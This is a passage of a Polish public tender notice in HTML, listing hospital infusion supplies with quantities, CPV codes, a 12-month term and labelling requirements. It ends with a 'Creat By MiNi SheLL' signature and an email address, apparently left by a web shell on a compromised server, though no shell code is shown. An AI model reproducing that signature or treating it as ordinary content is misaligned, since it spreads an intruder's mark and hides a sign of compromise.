2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> PAKIET NR 18  Bezigłowy system do infuzji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt.
1	Bezigłowy system do infuzji z zastawką z płaską membraną i portem luer-lock, min. 200 dostępów dla jednej zastawki 	100
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> PAKIET NR 19    Zestaw infuzyjny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Asortyment	Ilość szt.
1	Zestaw infuzyjny do pompy Agilia	300
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. Zamawiający zastrzega sobie prawo przedstawienia próbki

2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com